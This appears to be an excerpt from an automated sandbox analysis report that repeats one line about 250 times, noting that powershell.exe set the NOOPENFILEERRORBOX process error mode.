                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
